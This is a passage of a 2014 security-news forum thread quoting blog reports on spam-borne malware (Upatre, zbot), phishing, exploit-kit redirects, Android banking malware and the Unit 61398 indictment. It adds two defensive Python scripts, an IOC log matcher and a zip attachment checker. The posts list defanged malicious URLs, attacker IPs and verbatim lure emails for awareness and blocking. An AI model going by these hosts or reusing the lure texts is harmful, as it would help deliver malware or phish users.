May 19, 2014 - "The United States on Monday charged five Chinese military officers and accused them of hacking into American nuclear, metal and solar companies to steal trade secrets, ratcheting up tensions between the two world powers over cyber espionage. China immediately denied the charges, saying in a strongly worded Foreign Ministry statement the U.S. grand jury indictment was "made up" and would damage trust between the two nations... Federal prosecutors said the suspects targeted companies including Alcoa Inc, Allegheny Technologies Inc, United States Steel Corp, Toshiba Corp unit Westinghouse Electric Co, the U.S. subsidiaries of SolarWorld AG, and a steel workers' union. Officials declined to estimate the size of the losses to the companies, but said they were "significant." The victims had all filed unfair trade claims against their Chinese rivals, helping Washington draw a link between the alleged hacking activity and its impact on international business. According to the indictment, Chinese state-owned companies "hired" Unit 61398 of the People's Liberation Army "to provide information technology services" including assembling a database of corporate intelligence..."
___

E-On Energy Bill Spam
- http://threattrack.tumblr.com/post/86208169148/e-on-energy-bill-spam
May 19, 2014 - "Subjects Seen:
Unable to process your most recent bill payment
Typical e-mail details:
Dear customer,
This e-mail has been sent to you to inform you that we were unable to process your most recent payment of bill.
Please check attached file for more detailed information on this transaction.
IMPORTANT: The actual delivery date may vary from the Delivery By date estimate. Please make sure that there are sufficient available funds in your account to cover your payment beginning a few days before Delivery By date estimate and keep such funds available until the payment is deducted from your account.
If we fail to process a payment in accordance with your properly completed instructions, we will reimburse you any late-payment-related fees.
We apologize for any inconvenience this may cause.

Malicious File Name and MD5:
Eonenergy-Bill-29052014.zip (73C46BEB4997D121D88E4DA220EB8E75)
Eonenergy-Bill-29052014.scr (FE272CDACF8BB7C3A8B264BFDF3772FD)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/25eb07b63e508fa79319eaea1905cd2b/tumblr_inline_n5tos8wRJh1r6pupn.png

Tagged: eon, Upatre

- http://myonlinesecurity.co.uk/e-energy-unable-process-recent-bill-payment/
19 May 2014
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/Eon-Unable-to-process-your-most-recent-bill-payment.png

* https://www.virustotal.com/en/file/a3e96e906c9212a64d01610f009a59d87b44c2138bee1d6c647272d8358c6675/analysis/

:fear: :mad:

AplusWebMaster
2014-05-20, 14:58
FYI...

Fake Sage Invoice SPAM leads to malware
- http://blog.dynamoo.com/2014/05/fake-sage-invoice-spam-leads-to-malware.html
20 May 2014 - "This -fake- Sage spam leads to malware:
Date: Tue, 20 May 2014 09:20:53 +0100 [04:20:53 EDT]
From: Sage [Wilbur.Contreras@ sage-mail .com]
Subject: FW: Invoice_6895366
Please see attached copy of the original invoice (Invoice_6895366).

Attached is an archive file Invoice6895366.zip which in turn contains a malicious executable Invoice200522014.scr which has a VirusTotal detection rate of 8/52*. The Malwr analysis** shows that it then goes on to download further components from [donotclick]protecca .com/fonts/2005UKdp.zip [108.163.165.122]..."
* https://www.virustotal.com/en-gb/file/3e855b84d59fa0f780b96e7d2b436da633efbfda8181c8407700bac33a606c3c/analysis/1400575304/

** https://malwr.com/analysis/MWRiODI4NDBlYmFlNGNjOTgzNmYzMThjZDFlNzRkMDI/

- https://www.virustotal.com/en-gb/ip-address/108.163.165.122/information/

- http://myonlinesecurity.co.uk/fake-justice-co-uk-reminder-notice-ignore/
Updated 20 May 2014 - "... Another big run of these this morning. See the notice on Justice .co.uk* and Action Fraud** where they are asking you to report these to them..."
* https://www.justice.gov.uk/help/fraud

** http://www.actionfraud.police.uk/alert-beware-of-justice.gov.uk-scam-parking-fine-emails-mar14

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/REMINDER-NOTICE-DO-NOT-IGNORE.png

- http://threattrack.tumblr.com/post/86315391248/uk-ministry-of-justice-spam
May 20, 2014
Tagged: UK Ministry of Justice, Upatre
___

Fake LexisNexis Invoice – PDF malware
- http://myonlinesecurity.co.uk/lexisnexis-invoice-notification-may-2014-fake-pdf-malware/
20 May 2014 - "LexisNexis Invoice Notification for May 2014 pretending to come from LexisNexis [einvoice.notification@ lexisnexis .com] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Email looks like:
There was an invoice issued to your company: thespykiller .co.uk Please double click the PDF attachment to open or print your invoice.
To view full invoice details or for any Online Account Management options, download PDF attachment.
Account Number 278QCB
Invoice Number 195709944451
Invoice Date May 20, 2014
Invoice Amount $3.809.00
Account Balance $0.00
You can PAY YOUR BALANCE through the PowerInvoice please print the attached invoice and mail to the address indicated on the invoice statement...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/LexisNexis-Invoice-Notification-for-May-2014.png

20 May 2014 LexisNexis_Invoice_05202014.zip (12 KB) Extracts to
LexisNexis_Invoice_05202014.scr - Current Virus total detections: 0/52*
This LexisNexis Invoice Notification for May 2014 is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/79531dddf84a667bb833d326ce91cfbf54510f2e5fff4cfa12d24dad854e6fe7/analysis/1400601699/
___

SCAM: FIFA World Cup Tickets
- http://blog.trendmicro.com/trendlabs-security-intelligence/brazilian-users-being-scammed-with-2014-fifa-world-cup-tickets/
March 20, 2014 - "As the 2014 FIFA World Cup Brazil draws near, we are seeing more threats using the event as bait. We recently talked about cybercriminals in Brazil taking advantage of the event to spread malware, but we’ve found that the threats have gone beyond that: we’ve spotted -fake- FIFA websites selling game tickets... For the site meant for visitors from Brazil, would-be fans can buy a ticket for the final Game for 8,630.20 reais (or just under 3,900 US dollars). This price is almost 4000% higher than the official price on FIFA’s website. At a Brazilian complaints site, a user reported that he bought three tickets for the Portugal versus Germany match from this site, but hadn’t received any tickets yet. The victim also claims that this scam site left no phone number to be contacted. Another complaint on the same site says the only way for the scammers to be contacted is via chat or email... This scam is an example of how different legitimate services (hosting, domain registration, online payment system) can be used fraudulently to scam victims around the globe... remember that -only- FIFA is authorized to sell tickets for the World Cup games..."
___

iBanking: Exploiting the Full Potential of Android Malware
- http://www.symantec.com/connect/blogs/ibanking-exploiting-full-potential-android-malware
20 May 2014 - "Powerful Russian cybercrime gangs have begun to use premium Android malware to broaden their attacks on financial institutions. The tool, known as iBanking, is one of the most expensive pieces of malware Symantec has seen on the underground market and its creator has a polished, Software-as-a-Service business model... iBanking often masquerades as legitimate social networking, banking or security applications and is mainly being used to defeat out-of-band security measures employed by banks, intercepting one-time passwords sent through SMS. It can also be used to construct mobile -botnets- and conduct covert surveillance on victims. iBanking has a number of advanced features, such as allowing attackers to toggle between HTTP and SMS control, depending on the availability of an Internet connection... One of the most active iBanking users is the Neverquest* crew, a prolific cybercrime group that has infected thousands of victims with a customized version of Trojan.Snifula**. This financial Trojan can perform Man-in-the-Middle (MITM) attacks against a range of international banks. The Neverquest crew utilizes iBanking to augment its Snifula attacks, capturing one-time passwords sent to mobile devices for out-of-band authentication and transaction verification. Control numbers (the mobile numbers that the bots can receive instructions from) indicate that the Neverquest crew is likely operating out of Eastern Europe... Since iBanking victims are usually tricked into installing the app by a desktop financial Trojan, keeping your desktop antivirus software up to date will help avoid infection. You should be wary of any SMS messages which contain links to download APKs (Android application package files), especially from non-reputable sources. IT administrators should consider blocking all messages which contain a link to install an APK. 
Some iBanking APKs have been seeded onto trusted marketplaces and users should be aware of this as a potential avenue of infection. Users should be aware of sharing sensitive data through SMS, or at least be aware that malicious programs are sniffing this data..."

* http://malware.dontneedcoffee.com/2013/12/nitmo-no-just-ibanking-used-by-the.html

** http://www.symantec.com/security_response/writeup.jsp?docid=2013-112803-2524-99

:mad::mad: :sad:
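The posts above publish their indicators in defanged form ("[donotclick]protecca .com", a bare IP such as 108.163.165.122). The following script is an added example, not code from the quoted blogs: it refangs such a list, then checks proxy log lines for requests to the listed hosts (including subdomains) or to the listed IPs. The log lines and client addresses are constructed for the example; the log layout assumed is the squid native format (URL in field 7, `DIRECT/<ip>` in field 9).

```python
"""Match squid-style proxy log lines against defanged IOCs (added example).

Indicators are taken from the Upatre/Invoice post above in the defanged
form the post uses; the log lines below are constructed, not captured traffic.
"""
import re
import ipaddress
from urllib.parse import urlsplit

# Indicators quoted in the post above, as published (defanged).
IOCS = [
    "[donotclick]protecca .com/fonts/2005UKdp.zip",
    "108.163.165.122",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator into a plain lowercase host or IP.

    Handles the '[donotclick]' prefix, the 'example .com' spacing and the
    'example[.]com' style, then strips path and port so only the host is left.
    """
    s = ioc.replace("[donotclick]", "").strip()
    s = re.sub(r"\s+\.", ".", s)      # "protecca .com"  -> "protecca.com"
    s = re.sub(r"\[\.\]", ".", s)     # "example[.]com"  -> "example.com"
    host = s.split("/", 1)[0].lower()
    return host.split(":", 1)[0]


def build_blocklist(iocs):
    """Split refanged indicators into a host set and an IP set."""
    hosts, ips = set(), set()
    for ioc in iocs:
        h = refang(ioc)
        try:
            ips.add(str(ipaddress.ip_address(h)))
        except ValueError:
            hosts.add(h)
    return hosts, ips


# Constructed squid native log lines (assumption: this field layout):
# time elapsed client code/status bytes method url user hierarchy/peer type
LOG_LINES = [
    "1400575304.123 1200 10.0.0.5 TCP_MISS/200 15321 GET http://protecca.com/fonts/2005UKdp.zip - DIRECT/108.163.165.122 application/zip",
    "1400575310.456 80 10.0.0.7 TCP_MISS/200 2211 GET http://www.example.org/index.html - DIRECT/93.184.216.34 text/html",
    "1400575320.789 300 10.0.0.9 TCP_MISS/200 900 GET http://cdn.protecca.com/img.png - DIRECT/108.163.165.122 image/png",
    "1400575330.000 250 10.0.0.11 TCP_MISS/200 700 GET http://108.163.165.122/other.zip - DIRECT/108.163.165.122 application/zip",
]


def scan(lines, hosts, ips):
    """Return (client, reason) for every line whose destination matches an IOC.

    Host matches cover the listed domain and any subdomain of it; the peer IP
    is checked as well so direct-by-IP fetches are caught too.
    """
    hits = []
    for line in lines:
        f = line.split()
        if len(f) < 9:
            continue                      # malformed line, skip
        client, url, peer = f[2], f[6], f[8]
        dst_host = (urlsplit(url).hostname or "").lower()
        dst_ip = peer.split("/", 1)[1] if "/" in peer else ""
        if any(dst_host == h or dst_host.endswith("." + h) for h in hosts):
            hits.append((client, "host:" + dst_host))
        elif dst_ip in ips:
            hits.append((client, "ip:" + dst_ip))
    return hits


if __name__ == "__main__":
    hosts, ips = build_blocklist(IOCS)
    for client, reason in scan(LOG_LINES, hosts, ips):
        print(f"{client} contacted blocked destination ({reason})")
```

Blocking only the exact domain would miss the `cdn.` request in the third line, which is why the host comparison also accepts subdomains; the fourth line shows the direct-by-IP case that only the peer-IP check catches.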

AplusWebMaster
2014-05-21, 12:23
FYI...

Something evil on 93.171.173.173 ...
- http://blog.dynamoo.com/2014/05/something-evil-on-93171173173-sweet.html
21 May 2014 - "93.171.173.173 (Alfa Telecom, Russia) is currently distributing the Sweet Orange EK via a bunch of -hijacked- GoDaddy subdomains. The malware is being spread through code injected into legitimate but hacked websites. For example [donotclick]www.f1fanatic .co.uk is a compromised website that tries to redirect visitors to two different exploit kits:
[donotclick]adv.atlanticcity .house:13014/sysadmin/wap/fedora.php?database=3
[donotclick]fphgyw.myftp .biz/kfafyfztzhtwvjhpr37ffn9qi7w0ali5rhczqxcgif3d4
The second one is an attempt to load the Fiesta EK although the payload site is currently down. But the .house domain appears to be Sweet Orange (incidentally this is the first time that I've seen one of the new TLDs abused in this way)... The server on 93.171.173.173 hosts a number of subdomains that are hijacked from GoDaddy customers. I recommend that you block either the subdomain or domains themselves... The EK page itself has a VirusTotal detection rate of 0/53*, although hopefully some of the components it installs will trigger a warning."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/8e5f9f190b55a247fbce13296d38159f90f1dc8e888687a2b073288ebae607ba/analysis/1400664015/

93.171.173.173: https://www.virustotal.com/en-gb/ip-address/93.171.173.173/information/

- http://centralops.net/co/DomainDossier.aspx
93.171.173.173
inetnum: 93.171.172.0 - 93.171.175.255
country: RU ...
origin: AS29182

Diagnostic page for AS29182 (ISPSYSTEM-AS)
- https://www.google.com/safebrowsing/diagnostic?site=AS:29182
"Of the 16625 site(s) we tested on this network over the past 90 days, 264 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-05-22, and the last time suspicious content was found was on 2014-05-22... Over the past 90 days, we found 87 site(s) on this network... appeared to function as intermediaries for the infection of 393 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 260 site(s)... that infected 3562 other site(s)..."
___

FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity
- http://www.fireeye.com/blog/technical/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html
May 20, 2014 - "Yesterday, the U.S. Department of Justice (DOJ) announced the indictment of five members of the Second Bureau of the People’s Liberation Army (PLA) General Staff Department’s Third Department, also known as PLA Unit 61398. This is the -same- unit that Mandiant publicly unmasked last year in the APT1 report*. At the time it was originally released, China denounced the report, saying that it lacked sufficient evidence. Following the DOJ’s indictment, however, China’s usual response changed from “you lack sufficient evidence” to “you have fabricated the evidence”, calling on the U.S. to “correct the error immediately.” This is a significant evolution in China’s messaging; if the evidence is real, it overwhelmingly demonstrates China’s unilateral attempts to leapfrog years of industrial development — by using cyber intrusions to access and steal intellectual property... Although one could attempt to explain every piece of evidence away, at some point the evidence starts to become overwhelming when it is all pointing in one direction. Our timestamp data, derived from active RDP logins over a two year period, matches the DOJ’s timestamp data, derived from a different source — active Dynamic DNS re-pointing over a five year period. These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are... "
(More detail at the fireeye URL above.)
* http://intelreport.mandiant.com/
___

“Amazoon” Phishing
- http://blog.malwarebytes.org/fraud-scam/2014/05/watch-out-for-amazoon-phishing/
May 21, 2014 - "Be warned that there are some typo happy phishers looking out for login credentials... take a trip down the Amazoon:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/amazoon1.jpg
It reads:
Verify your Amazoon account
Dear Amazon user,
We need to confirm your account information,
you must confirm your amazon account before we close it.
Click the link below to confirm your account information using our secure server.

Clicking the “Manage” link will take victims to a page asking for username and password information:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/amazoon2.jpg
After this, they’re faced with a page asking for personal information (name, address, phone number and so on):
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/amazoon3.jpg
The page after this one is broken – looks like the host has taken it down mid-blog so hopefully nobody else will be scammed by this one. Typically the pattern for this kind of thing would be login details, personal information then card data. While we can’t say for sure what lay in wait at step 3, we can say to be on your guard for any more emails from “Amazoon” and -never- hand over personal data such as card details in response to emails you’ve been sent."

>> http://www.dilbert.com/2014-05-19/
___

Fake Contrat Commercant SPAM – PDF malware
- http://myonlinesecurity.co.uk/contrat-commercant-n-9579514-fake-pdf-malware/
21 May 2014 - "Contrat Commercant N: 9579514 pretending to come from Rick Goddard [Rick.Goddard@ credit-agricole .fr] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. This is written entirely in French...
Email looks like :
Hello,
Pleased to have made your acquaintance. I confirm that I have received the documents..
Can you tell me whether you wish to keep merchant contract no. 9579514? Without action on our part, it will be automatically terminated on 22 May 2014.
To avoid automatic termination, give 2 minutes to the Credit Agricole service by filling in the attached form.
Rick Goddard ...

21 May 2014: Contrat_9579514.zip (8 KB) Extracts to Contrat_210514.scr
Current Virus total detections: 0/52* ...
This is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/7cbc75c1140d3138bfdbe6becc65c5f064bca38460c9591f5585e24754a4bc09/analysis/
___

PrimeAspire (primeaspire .com) spam
- http://blog.dynamoo.com/2014/05/primeaspire-primeaspirecom-spam.html
21 May 2014 - "Startup or no startup, sending spam to a spamtrap is not a good way to drum up business..
From: Team@ primeaspire .com
To: donotemail@ wearespammers .com
Date: 20 May 2014 13:32
Subject: PrimeAspire - The Freelance Platform
Hello,
Following our recent launch we'd like to invite you to PrimeAspire where you can post any task and securely get skilled people to complete specific freelance tasks.
The platform is completely free and used by talented people looking for freelance projects.
Learn more
Thanks,
The PrimeAspire team ...

Screenshot: http://4.bp.blogspot.com/-a2q8a983zhc/U3vdzEHjMDI/AAAAAAAADB4/frl26R0YCVk/s1600/primeaspire.png

... CEO of PrimeAspire is one Chris Adiolé. PrimeAspire (strictly speaking it is Prime Aspire Ltd) is a real company (07850209 in the UK), and Mr Adiolé even has his name on the domain WHOIS details rather than hiding behind a proxy service... Originating IP is 79.170.44.6 which is Heart Internet in the UK. The primeaspire.com domain is hosted with the same firm on 79.170.40.239... promoting your startup through spam is always a very bad move..."

:fear: :mad:
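Both the LexisNexis invoice post and the Contrat Commercant post above describe the same lure: a small .zip whose only member is a .scr carrying a PDF icon, which looks like a document when extensions are hidden. The script below is an added example (not code from the quoted blogs) of the check a mail gateway or analyst can run on such an attachment: it lists each zip member, reads its first bytes, and flags executable extensions, PE headers behind non-executable names, and double extensions such as `.pdf.scr`. The sample zip and its member contents are constructed in the code; the member names mimic the ones quoted in the posts.

```python
"""Flag executables posing as documents inside a zip attachment (added example).

The sample archive is built in memory with constructed contents; nothing here
is taken from the real lures beyond the file names quoted in the posts.
"""
import io
import zipfile

# Extensions Windows will execute on double-click (assumed set for the example).
EXEC_EXT = {".scr", ".exe", ".com", ".pif", ".cpl", ".bat", ".cmd", ".js", ".vbs"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}
MAGIC = {b"MZ": "pe-executable", b"%PDF": "pdf"}


def sniff(head: bytes) -> str:
    """Classify a file by its leading bytes rather than its name."""
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"


def inspect_zip(data: bytes):
    """Return one finding per member: name, sniffed kind, size and flag reasons."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            lower = info.filename.lower()
            parts = lower.split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            with zf.open(info) as fh:
                head = fh.read(8)          # only the header is needed
            kind = sniff(head)
            reasons = []
            if ext in EXEC_EXT:
                reasons.append("executable extension " + ext)
            if kind == "pe-executable" and ext not in EXEC_EXT:
                reasons.append("PE header behind non-executable extension")
            if len(parts) > 2 and any("." + p in DOC_EXT for p in parts[1:-1]):
                reasons.append("document extension hidden before final extension")
            findings.append({
                "name": info.filename,
                "kind": kind,
                "size": info.file_size,
                "flags": reasons,
            })
    return findings


def suspicious(findings):
    """Names of members that raised at least one flag."""
    return [f["name"] for f in findings if f["flags"]]


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the 20/21 May 2014 lures (not the real samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # .scr with a DOS/PE-style header: what the real lure contains
        zf.writestr("LexisNexis_Invoice_05202014.scr", b"MZ" + b"\x90" * 62 + b"PE\0\0" + b"\0" * 100)
        # double extension: shows as "Invoice.pdf" when known extensions are hidden
        zf.writestr("Invoice.pdf.scr", b"MZ" + b"\0" * 64)
        # a benign document, which must not be flagged
        zf.writestr("real_invoice.pdf", b"%PDF-1.4\n%constructed sample\n")
    return buf.getvalue()


if __name__ == "__main__":
    for f in inspect_zip(build_sample_zip()):
        status = "SUSPICIOUS" if f["flags"] else "ok"
        print(f"{status:10} {f['name']} kind={f['kind']} size={f['size']} {'; '.join(f['flags'])}")
```

The extension test alone would already catch both lures quoted above; the magic-byte check is there for the case the posts hint at, an executable renamed to a document extension, which a name-only rule misses.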

AplusWebMaster
2014-05-22, 18:23
FYI...

Browlock -redirects- via Google Image Search
- http://blog.malwarebytes.org/fraud-scam/2014/05/browlock-redirects-via-google-image-search/
May 22, 2014 - "We saw a website offering up a downloadable version of what they claim is Telltale’s Back to the Future game. The site had apparently been -hacked- allowing those who compromised it to add redirect code onto the website. As a side effect of this, clicking on their image via the initial returned results from a Google image search while using Chrome will mean your browser is redirected to a Browlock scam page, complete with dire warnings placed on top of the preview image which is now adrift in a sea of fakery:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/locksearch1.png
... we’re looking at a typical “Your PC has been encrypted, pay us money to return your files” message – the translation of which can be seen over on the F-Secure website* – and depending on your browser set up, you may have a few problems getting rid of the page. For example:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/locksearch2.jpg
Once the box is on the screen, there is no way to open another tab or indeed navigate to one that is already open. For similar reasons, you won’t be able to close the browser either. The browser is trapped in a loop of confirmation pop-up boxes and our old friend CTRL+ALT+DEL will be required to kill the browser in Task Manager. The end-user isn’t under too much risk here – the scam page is simply -pretending- that the PC has had all files encrypted, and wants them to pay up to get their hands back on valuable personal data. There have been instances in the past where Fake AV has taken advantage of image search and caused problems for Mac users, and here’s a Youtube video** of the Windows equivalent. In this case, if you’re ever able to get the popup out of the way AND close the image AND open up the vanilla website AND read the Russian text…you should close the browser via the wonder of Task Manager and go do something else anyway. Your data is safe, no need to hand over cash to scammers!"
* http://www.f-secure.com/weblog/archives/00002698.html

** http://www.youtube.com/watch?v=1oxAK4TP6Uk
___

Malvertising ads on popular site leads to Silverlight exploit, Zeus Trojan
- http://blog.malwarebytes.org/exploits-2/2014/05/malvertising-campaign-on-popular-site-leads-to-silverlight-exploit-zeus-trojan/
May 22, 2014 - "Malicious ads displayed on legitimate websites (malvertising) are something we see a lot of these days... third-party content is always a bit iffy because you just can’t control it. Case in point, a popular website recently suffered a malvertising attack. Our honeypots detected the malicious redirection from a compromised ad in the wee hours of last Friday morning. We contacted both the site owners and the advertising agency and the malicious traffic stopped shortly after. Over the course of the weekend and the beginning of the week, we exchanged some further emails to get a better understanding about the attack, which turned out to be an Ad server compromise... the advertising agency had suffered a server compromise themselves. I managed to talk to them and they were willing to share information about the attack that affecte